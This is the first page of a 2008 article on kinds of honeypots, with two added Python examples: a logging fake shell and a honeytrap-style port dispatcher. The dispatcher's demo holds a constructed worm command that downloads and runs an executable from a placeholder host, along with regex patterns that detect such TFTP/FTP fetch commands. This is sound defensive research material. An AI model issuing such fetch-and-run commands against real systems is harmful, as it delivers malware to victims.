A Guide to Different Kinds of Honeypots
Jamie Riden and Christian Seifert 2008-02-14

Honeypots come in many shapes and sizes and are available to mimic lots of
different kinds of applications and protocols. We shall take the
definition of a honeypot as "a security resource whose value lies
in being probed, attacked, or compromised"[Spitzner02]. That is, a
honeypot is a system we can monitor to observe how attackers behave, a
system which is designed to lure attackers away from more valuable
systems and/or a system which is designed to provide early warning of
an intrusion to the target network. A honeypot may be used for all three
applications at the same time.

The first appearances of honeypots in computer science are possibly in "The Cuckoo's Egg" by Clifford Stoll and in "An Evening with Berferd" by Bill Cheswick. In the former, fake military reports were used as bait for the attackers. The latter is more recognisable as the sort of honeypot we know today, where an attacker is monitored and diverted away from production systems. In this paper we give a brief overview of what is available and highlight some of the key differences between today's honeypots.

Are honeypots high maintenance?

A major distinction between types of honeypots is the degree to which an attacker can interact with the application or service. A truly vulnerable system allows the attacker to interact with it on every level: the bad guys can probe, attack and compromise it, and upon successful exploitation use it as a tool for further attacks. Such systems are therefore called high interaction honeypots; the Honeynet Project's 3rd Generation Honeywall ('roo') is a framework for deploying and monitoring them.

These require a lot of close monitoring and detailed analysis to see what the attacker is up to. We might expect these honeypots to be used to monitor an attacker who is trying to break in by guessing an SSH username and password. It is not, in general, possible to provide an emulation of a UNIX shell that will convince an attacker for long, and so a high interaction system is preferred. This is also likely to be what many people think of as a typical honeypot system: a vulnerable system with additional instrumentation to help the owner in monitoring.

Theoretically, any vulnerable machine can act as a high interaction honeypot: connect it to the network and you will soon observe the first attacks. However, a full forensic analysis of such a bare system is very difficult, which is why a honeywall, sitting between the honeynet and the outside world, is often used. It collects network traffic and the attacker's keystrokes and logs it all in a central repository for later forensic analysis. Keystrokes are captured on the honeypot itself rather than reconstructed from the wire, so that an attacker cannot conceal their actions by using an encrypted protocol like SSH.

The second type, the low interaction honeypots generally emulate vulnerabilities rather than presenting real vulnerable systems and therefore the attacker is not able to interact with it on all levels. For this reason, they are safer, in that you do not have to worry about the actions of the attacker on the system, but are considerably less flexible. An example of a (relatively) low interaction honeypot is nepenthes which will automatically collect samples of Windows-based worms with minimal user intervention. Nepenthes is a fantastic tool for collecting malware samples, but doesn't provide a complete simulation of a Windows host. Another program, honeyd allows the user to create a simulated network of over 60,000 hosts which can appear to be running different operating systems and services.
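The limit of emulation described above, and the low interaction approach in general, can be shown with a small fake shell. The following is an added example written for this guide; it is not code from the article, from nepenthes or from honeyd. It imitates only the first exchange a password-guesser sees after a "successful" SSH or telnet login: a login prompt, a password prompt and a handful of canned command outputs. Nothing the attacker types is executed; every line is recorded, and any command the emulation cannot answer is noted separately, because that is the point at which the attacker will usually notice that something is wrong. The hostname, banner text and canned outputs are made up, and the accepted password is an assumption of the example.

```python
"""Minimal low-interaction fake shell (added example; not from the article or
from the tools it names).  Canned replies only; records every attacker line;
never executes anything.  Hostnames, banners and outputs are invented."""
import socketserver
import time

# Canned outputs. A real host has unbounded state here; we have four entries.
CANNED = {
    "uname -a": "Linux honey01 2.6.24-1 #1 SMP Thu Jan 31 11:01:12 UTC 2008 i686 GNU/Linux",
    "id": "uid=0(root) gid=0(root) groups=0(root)",
    "w": " 13:02:11 up 41 days,  3:12,  1 user,  load average: 0.00, 0.01, 0.00",
    "ls": "bin  boot  dev  etc  home  lib  proc  root  sbin  tmp  usr  var",
}
PROMPT = "root@honey01:~# "


class FakeShell:
    """Tiny state machine: login -> password -> shell -> closed."""

    def __init__(self, accept_password="123456"):   # assumed "weak" password
        self.state = "login"
        self.accept_password = accept_password
        self.log = []          # (timestamp, state, attacker input)
        self.unscripted = []   # commands we had no canned answer for

    def feed(self, line):
        """Consume one attacker line and return the text to send back."""
        line = line.rstrip("\r\n")
        self.log.append((time.time(), self.state, line))
        if self.state == "login":
            self.state = "password"
            return "Password: "
        if self.state == "password":
            if line == self.accept_password:
                self.state = "shell"
                return "Last login: Thu Feb 14 09:12:01 2008 from 192.0.2.7\n" + PROMPT
            self.state = "login"
            return "Login incorrect\nlogin: "
        # shell state
        if line in ("exit", "logout"):
            self.state = "closed"
            return "logout\n"
        if line in CANNED:
            return CANNED[line] + "\n" + PROMPT
        # Anything unscripted is where the emulation gives itself away.
        self.unscripted.append(line)
        cmd = line.split()[0] if line.split() else line
        return f"-bash: {cmd}: command not found\n" + PROMPT


def emulate_session(lines, accept_password="123456"):
    """Drive a FakeShell with a list of attacker lines; returns (replies, shell)."""
    shell = FakeShell(accept_password)
    replies = []
    for line in lines:
        replies.append(shell.feed(line))
        if shell.state == "closed":
            break
    return replies, shell


class Handler(socketserver.StreamRequestHandler):
    """Serve the emulation on a real TCP port for a live deployment."""

    def handle(self):
        shell = FakeShell()
        self.wfile.write(b"login: ")
        for raw in self.rfile:
            self.wfile.write(shell.feed(raw.decode("latin-1", "replace")).encode())
            if shell.state == "closed":
                break
        # A real deployment would ship shell.log to a central store, as a
        # honeywall does; here it is simply printed.
        for ts, state, line in shell.log:
            print(f"{ts:.0f} {self.client_address[0]} [{state}] {line!r}")


if __name__ == "__main__":
    # Low ports need privileges; 2323 is fine for a demonstration.
    socketserver.TCPServer(("0.0.0.0", 2323), Handler).serve_forever()
```

Running a constructed session through `emulate_session` (login, the accepted password, `uname -a`, `cat /proc/cpuinfo`, `exit`) shows the trade-off: the attacker can do nothing to the host, the whole session is recorded, and the fourth line is already outside what the script can answer. Extending the canned table buys a little time; it never reaches the fidelity of a real, instrumented host.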

The honeypot tool honeytrap is designed to capture unknown attacks. It does this by listening on all TCP ports and dynamically loading handlers for each port. By contrast, nepenthes can capture attacks against a service it emulates, such as microsoft-ds on 445/tcp, but a connection attempt to a port for which it has no emulation is simply ignored. Honeytrap has simple handlers which will record information about the TCP session, replay previously captured responses, download remote files when given (T)FTP commands, or proxy connections to another program.
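The three behaviours just listed for honeytrap (a catch-all handler for ports nobody registered, replay of a response captured earlier from a real server, and extraction of (T)FTP download commands from the attack string) are shown below in an added example. This is illustrative code written for this guide, not honeytrap's or nepenthes' own implementation, and it does not reproduce how honeytrap actually binds ports on demand. The captured banners, the SMB handler that merely notes the hand-off, the attack strings and the IP addresses (documentation ranges) are all constructed for the example.

```python
"""Honeytrap-style dispatch with a catch-all handler, banner replay and
(T)FTP download-command extraction (added example; not honeytrap's code)."""
import re
from dataclasses import dataclass, field


@dataclass
class Session:
    src: str
    dport: int
    payload: bytes
    handler: str = ""
    response: bytes = b""
    downloads: list = field(default_factory=list)


# Responses previously captured from real services, keyed by port (constructed).
# Sending a plausible banner keeps the attacker talking long enough to send
# the actual exploit, which is what we want to record.
REPLAY = {
    21: b"220 (vsFTPd 2.0.5)\r\n",
    25: b"220 mail.example.net ESMTP\r\n",
    110: b"+OK POP3 ready\r\n",
}

# Fetch instructions commonly embedded in worm command strings:
#   tftp -i HOST GET FILE        and       open HOST [PORT] ... get FILE
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
FTP_RE = re.compile(rb"open\s+(\S+)(?:\s+(\d+))?.*?get\s+(\S+)", re.I | re.S)


def extract_downloads(payload):
    """Return (proto, host, port, filename) for each fetch instruction found.
    FTP_RE is deliberately loose (the 'get' may be far from the 'open'), so
    treat results as leads for an analyst, not as ground truth."""
    found = []
    for host, fname in TFTP_RE.findall(payload):
        found.append(("tftp", host.decode(), 69, fname.decode()))
    for host, port, fname in FTP_RE.findall(payload):
        found.append(("ftp", host.decode(), int(port or 21), fname.decode()))
    return found


HANDLERS = {}


def handler(port):
    """Decorator registering a protocol-specific handler for one port."""
    def register(fn):
        HANDLERS[port] = fn
        return fn
    return register


def default_handler(s):
    """Any port without a registered handler: record everything, replay a
    captured banner if one exists, and look for download commands."""
    s.handler = "default"
    s.response = REPLAY.get(s.dport, b"")
    s.downloads = extract_downloads(s.payload)
    return s


@handler(445)
def smb_handler(s):
    # A port with a protocol-aware tool behind it (the article's nepenthes)
    # would be handed off here; this example only records the dispatch.
    s.handler = "smb"
    s.downloads = extract_downloads(s.payload)
    return s


def dispatch(src, dport, payload):
    """Entry point: one call per accepted connection with its first bytes."""
    s = Session(src, dport, payload)
    return HANDLERS.get(dport, default_handler)(s)


if __name__ == "__main__":
    # Constructed attack string on a port nobody registered.
    s = dispatch("198.51.100.9", 6000, b"cmd /c tftp -i 192.0.2.10 GET load.exe & load.exe")
    print(s.handler, s.downloads)
```

The value of the catch-all is that an attack on port 6000 is neither dropped nor confused with a known service: it is recorded under the default handler and, if the payload names a file to fetch, the host and filename are ready for a download step. Only port 445 has a dedicated handler here; everything else, including an FTP connection that has sent no bytes yet, gets the replay banner for its port or an empty response.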

Article continued on Page 2 



Copyright 2008, SecurityFocus